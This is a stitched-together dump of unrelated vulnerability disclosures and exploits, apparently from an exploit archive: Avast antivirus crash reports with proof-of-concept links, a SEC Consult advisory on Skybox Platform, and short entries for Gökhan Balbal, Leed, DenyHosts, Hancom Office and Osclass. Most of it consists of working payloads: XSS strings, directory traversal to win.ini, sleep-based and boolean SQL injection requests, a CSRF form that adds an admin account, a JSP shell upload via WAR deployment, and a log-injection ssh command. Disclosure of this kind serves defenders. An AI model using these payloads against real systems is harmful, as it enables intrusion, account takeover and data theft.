Trivial fuzzing of molebox archives revealed a heap overflow decrypting the packed image in moleboxMaybeUnpack. This vulnerability is obviously exploitable for remote arbitrary code execution as NT AUTHORITY\SYSTEM.
The attached testcase should cause heap corruption in AvastSvc.exe, please enable page heap if you have trouble reproducing.
HEAP[AvastSvc.exe]: ZwAllocateVirtualMemory failed c0000018 for heap 00310000 (base 0E560000, size 0006B000)
(474.9f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0e5cb478 ebx=0dd70000 ecx=0000d87f edx=0e55f080 esi=00310000 edi=00003bf8
eip=7731836b esp=0be6d338 ebp=0be6d364 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
ntdll!RtlpDeCommitFreeBlock+0x146:
7731836b 80780703 cmp byte ptr [eax+7],3 ds:002b:0e5cb47f=??
#0 0xf702d588 in asw::root::NewDesCryptBlock(unsigned char*, unsigned int, unsigned char const*, bool, int) ()
#1 0xf702b009 in Mole_DecryptBuffer () from /proc/self/cwd/defs/15092301/engine.so
#2 0xf6f6a124 in moleboxMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) ()
#3 0xf6f7630d in CPackWinExec::packGetNext(void*, ARCHIVED_FILE_INFO*) ()
#4 0xf6e8cdf3 in CAllPackers::GetNext(unsigned int, void*, ARCHIVED_FILE_INFO*) ()
#5 0xf6e76fc9 in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) ()
#6 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) ()
#7 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) ()
#8 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) ()
#9 0xf6e7d6db in avfilesScanRealMulti ()
#10 0xf6e81915 in avfilesScanReal ()
#11 0x0805d2a5 in avfilesScanReal ()
#12 0x0805498c in engine_scan ()
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38933.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=551
The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38932.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=550
The attached file crashes in CmdExtract::UnstoreFile because the signed int64 DestUnpSize is truncated to an unsigned 32bit integer. Perhaps CmdExtract::ExtractCurrentFile should sanity check Arc.FileHead.UnpSize early.
I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38930.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=554
The attached PEncrypt packed executable causes an OOB write on Avast Server Edition.
(gdb) bt
#0 0xf6f5e64a in EmulatePolyCode(_POLY_INFO*, int) () from /proc/self/cwd/defs/15092301/engine.so
#1 0xf6f7d334 in pencryptMaybeUnpack(CFMap&, _PEEXE_INFO*, asw::root::CGenericFile*, _EXE_UNPACK_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#2 0xf6f75805 in CPackWinExec::packIsPacked(CFMap&, void**, ARCHIVE_UNPACKING_INFO*) () from /proc/self/cwd/defs/15092301/engine.so
#3 0xf6e8d1a2 in CAllPackers::IsPacked(CFMap&, _SARCHIVERANGE*, unsigned int, unsigned int, unsigned int, unsigned int, CObjectName const*, unsigned int*, unsigned int*, _PEEXE_INFO**) () from /proc/self/cwd/defs/15092301/engine.so
#4 0xf6e784ef in CScanInfo::ProcessPackingReal(CObjectName&, CFMap&, _VIRUSDATAARRAY*, int&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#5 0xf6e78bdd in CScanInfo::ProcessPacking(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#6 0xf6e74fbd in CScanInfo::ProcessArea(CObjectName&, unsigned int, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#7 0xf6e752af in CScanInfo::ProcessTopArea(CObjectName&, unsigned int) () from /proc/self/cwd/defs/15092301/engine.so
#8 0xf6e7d6db in avfilesScanRealMulti () from /proc/self/cwd/defs/15092301/engine.so
#9 0xf6e81915 in avfilesScanReal () from /proc/self/cwd/defs/15092301/engine.so
#10 0x0805d2a5 in avfilesScanReal ()
#11 0x0805498c in engine_scan ()
(gdb) x/i $pc
=> 0xf6f5e64a <_Z15EmulatePolyCodeP10_POLY_INFOi+7194>: mov WORD PTR [edx],ax
(gdb) p/x $edx
$7 = 0xe73f181f
(gdb) p/x $ax
$8 = 0x1060
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38931.zip
SEC Consult Vulnerability Lab Security Advisory < 20151210-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Skybox Platform
vulnerable version: <=7.0.611
fixed version: 7.5.401
CVE number:
impact: Critical
homepage: www.skyboxsecurity.com/products/appliance
found: 2014-12-04
by: K. Gudinavicius, M. Heinzl, C. Schwarz (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Skybox Security provides cutting-edge risk analytics for enterprise security
management. Our solutions give you complete network visibility, help you
eliminate attack vectors, and optimize your security management processes.
Protect the network and the business."
Source: http://www.skyboxsecurity.com/
Business recommendation:
------------------------
Attackers are able to perform Cross-Site Scripting and SQL Injection attacks
against the Skybox platform. Furthermore, it is possible for
unauthenticated attackers to download arbitrary files and execute arbitrary
code.
SEC Consult recommends the vendor to conduct a comprehensive security
analysis, based on security source code reviews, in order to identify all
available vulnerabilities in the Skybox platform and increase the security
of its customers.
Vulnerability overview/description:
-----------------------------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
2) Multiple Stored Cross-Site Scripting Vulnerabilities
3) Arbitrary File Download and Directory Traversal Vulnerability
4) Blind SQL Injection Vulnerability
5) Remote Unauthenticated Code Execution
Proof of concept:
-----------------
1) Multiple Reflected Cross-Site Scripting Vulnerabilities
Multiple scripts are prone to reflected Cross-Site Scripting attacks.
The following example demonstrates this issue with the
service VersionRepositoryWebService:
POST /skyboxview/webservice/services/VersionRepositoryWebService HTTP/1.0
Content-type: text/plain
User-Agent: Axis/1.4
Host: localhost:8282
SOAPAction: ""
Content-Length: 863
<?xml version="1.0" encoding="UTF-8"?><soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soapenv:Body><ns1:checkV
ersion
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://com/skybox/view/webservice/versionrepositoryc4f85">&l
t;a
xmlns:a='http://www.w3.org/1999/xhtml'><a:body
onload='alert(1)'/></a>9884933253b"><components
soapenc:arrayType="soapenc:string[1]" xsi:type="soapenc:Array"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><components
xsi:type="soapenc:string">Application</components></components><os
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">windows-64</os><curre
ntVersion
xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">7.0.601</currentVersi
on></ns1:checkVersion></soapenv:Body></soapenv:Envelope>
Other scripts and parameters, such as the parameter status of the login script
(located at https://localhost:444/login.html) are affected as well. The
following request demonstrates this issue:
https://localhost:444/login.html?status=%27%3C/script%3E%3Cscript%3Ealert%28doc
ument.cookie%29%3C/script%3E
2) Multiple Stored Cross-Site Scripting Vulnerabilities
Multiple fields of the Skybox Change Manager, which can be accessed at
https://localhost:8443/skyboxview/, are prone to stored Cross-Site Scripting
attacks. For example when creating a new ticket, the title can be misused
to insert JavaScript code. The following request to the server demonstrates
the issue:
Request:
POST /skyboxview/webskybox/tickets HTTP/1.1
Host: localhost:8443
[...]
7|0|18|https://localhost:8443/skyboxview/webskybox/|272....5E|com.skybox.view.g
wt.client.service.TicketsService|createAccessChangeTicket|com.skybox.view.trans
fer.netmodel.tickets.AccessChangeTicketData/1874789321|com.skybox.view.transfer
.modelview.ChangeRequestGraph/1577593632|com.skybox.view.transfer.netmodel.phas
es.BasePhaseOperation/3921542662|java.util.Collection|com.skybox.view.transfer.
netmodel.PhaseDefinitionId/3246549697|java.lang.String/2004016611|com.skybox.vi
ew.transfer.properties.PropertyBag/343216801|com.skybox.view.transfer.netmodel.
TicketWorkflowId/3953158119|com.skybox.view.transfer.netmodel.ConfigurationItem
Id/1448062761|com.skybox.view.transfer.netmodel.tickets.ChangeRequestRiskEnum/8
52682809||skyboxview|test"><img
src=yy onerror=alert(document.cookie) >|java.util.ArrayList/41
Other fields, like "Comments" and "Description", are affected as well.
3) Arbitrary File Download and Directory Traversal Vulnerability
Skybox Change Manager allows to upload and download attachments for tickets.
The download functionality can be exploited to download arbitrary files. No
authentication is required to exploit this vulnerability. The following
request demonstrates the issue:
POST /skyboxview/webskybox/attachmentdownload HTTP/1.1
Host: localhost:8443
tempShortFileName=aaaaaa&tempFileName=../../../../../../../../../../../windows/
win.ini
The script /skyboxview/webskybox/filedownload is also affected by the same
vulnerability.
Note: The upload functionality can also be used to upload files without
authentication.
4) Blind SQL Injection Vulnerability
Arbitrary SQL queries can be inserted into the service VersionWebService. The
following request demonstrates this issue with a simple sleep statement:
POST https://localhost:8443/skyboxview/webservice/services/VersionWebService
HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 619
Host: localhost:8443
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ver="http://com/skybox/view/webservice/version">
<soapenv:Header/>
<soapenv:Body>
<ver:getUserLockInSeconds
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<username xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">admin'+(select
* from (select(sleep(20)))a)+'</username>
</ver:getUserLockInSeconds>
</soapenv:Body>
</soapenv:Envelope>
No authentication is required to exploit this vulnerability.
5) Remote Unauthenticated Code Execution
It is possible to upload WAR files, containing for example JSP files, which
will be automatically deployed by the Skybox appliance. This way, it is
possible to upload a JSP shell which enables an attacker to execute arbitrary
commands running in the same context as the web server running (by default
skyboxview).
The following request to the Skyboxview update service (located at
https://localhost:9443) uploads a JSP file. It will be uploaded to
/opt/skyboxview/thirdparty/jboss/server/web/deploy where it is automatically
extracted and deployed at
/opt/skyboxview/thirdparty/jboss/server/web/work/jboss.web/localhost.
POST /skyboxview-softwareupdate/services/CollectorSoftwareUpdate HTTP/1.1
Accept-Encoding: gzip,deflate
SOAPAction: ""
Content-Type: multipart/related; type="text/xml";
start="<rootpart@soapui.org>";
boundary="----=_Part_1_1636307031.1418103287783"
MIME-Version: 1.0
User-Agent: Jakarta Commons-HttpClient/3.1
Host: localhost:9443
Content-Length: 1944
------=_Part_1_1636307031.1418103287783
Content-Type: text/xml; charset=UTF-8
Content-Transfer-Encoding: 8bit
Content-ID: <rootpart@soapui.org>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:sof="http://com/skybox/view/agent/webservice/softwareupdate">
<soapenv:Header/>
<soapenv:Body>
<sof:uploadPatch
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<patchName xsi:type="soapenc:string"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">../../thirdparty/jbos
s/server/web/deploy/helloworld2.war</patchName>
<patchData href="cid:helloworld.war"/>
</sof:uploadPatch>
</soapenv:Body>
</soapenv:Envelope>
------=_Part_1_1636307031.1418103287783
Content-Type: application/octet-stream; name=helloworld.war
Content-Transfer-Encoding: binary
Content-ID: <helloworld.war>
Content-Disposition: attachment; name="helloworld.war"; filename="helloworld.wa
r"
[binary]
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the Skybox platform
version 7.0.611, which was the most recent version at the time of discovery.
Vendor contact timeline:
------------------------
Communication with the vendor was handled by SEC Consult's client.
Solution:
---------
According to the release-notes, the issues have been fixed in the following
versions (reference number "19184"):
7.5.401: Reflected Cross-site scripting vulnerabilities
7.5.201: Remote Code Execution, SQL Injection, Arbitrary File Download and
Directory Traversal
Users of Skybox are advised to upgrade to version 7.5.401 or higher.
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF M. Heinzl/ @2015
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Þeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Gökhan Balbal
|~Affected Version : v2.0
|~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html
|~RISK : High
|~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi"
##################++ Exploit ++ ######################################
<html>
<body>
<form action="http://[TARGET]/admin/ekleadmin2.php" method="POST">
<input type="hidden" name="kadi" value="knockout" />
<input type="hidden" name="sifre" value="password" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
############################################################
source: https://www.securityfocus.com/bid/64426/info
Leed is prone to an SQL-injection vulnerability.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/leed/action.php?action=removeFolder&id=[SQL Injection]
source: https://www.securityfocus.com/bid/64478/info
DenyHosts is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.
ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21
source: https://www.securityfocus.com/bid/64499/info
Hancom Office is prone to a remote heap-based buffer-overflow vulnerability.
An attacker can exploit this issue by enticing an unsuspecting victim to open a malicious '.hml' document file.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Hancom Office 2010 SE 8.5.8 is vulnerable; Other versions may also be affected.
<TEXTART Text="AAAAAAAA...(more than 500 bytes)" X0="0" X1="14173" X2="14173" X3="0" Y0="0" Y1="0" Y2="14173" Y3="14173">
source: https://www.securityfocus.com/bid/64386/info
Osclass is prone to the following input-validation vulnerabilities:
1. A cross-site request-forgery vulnerability
2. Multiple directory-traversal vulnerabilities
3. An SQL-injection vulnerability
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions, to view arbitrary local files and directories within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Osclass 3.3 is vulnerable; other versions may also be affected.
Cross-site request forgery:
[!] Exploit Already Tested ... on apache
[^] Error console:- /general/index.php
[?] proof of concept :
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="<empty>" action="http://www.example.com/general/index.php"
method=GET enctype="multipart/form-data">
<input type=hidden size=30 maxlength=30 name=page value="">
<input type=hidden size=30 maxlength=30 name=sOrder value="">
<input type=hidden size=30 maxlength=30 name=iOrderType value="">
<td><input type=text size=30 maxlength=250 name=sPattern value=""></td>
<td><input type=text size=30 maxlength=100 name=sCity value=""></td>
<td><input type=text size=30 maxlength=100 name=sRegion value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td>
<input type=text size=30 maxlength=250 name=sPriceMin value=""></td>
<td><input type=text size=30 maxlength=100 name=sPriceMax
value=""></td>
<td><input type=Checkbox size=10 maxlength=10 name=sCategory
value=""></td>
<input type=submit class=button value='Save'>
</form>
</html>
Directory Traversal:
[!] Exploit Already Tested ... on apache
[^] Error console:- directory traversal allow to dump db
[?] proof of concept :
/general/oc-content/languages/en_US/mail.sql
/general/oc-includes/osclass/installer/basic_data.sql
/general/oc-includes/osclass/installer/pages.sql
exploit
http://www.example.com/general/oc-content/languages/en_US/mail.sql
SQL injection:
[!] Exploit Already Tested ... on apache
[^] Error console:-
1*-URL encoded GET input action was set to -1' or 18 = '16
2*-URL encoded POST input action was set to -1" or 34 = "31
[?] proof of concept :
/general/oc-admin/index.php
/general/index.php
1*-
RequestGET
/general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login
HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2;
9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept: */*
2*-
POST /general/index.php HTTP/1.1
Content-Length: 246
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2
Host: demo.osclass.org
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Accept: */*
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst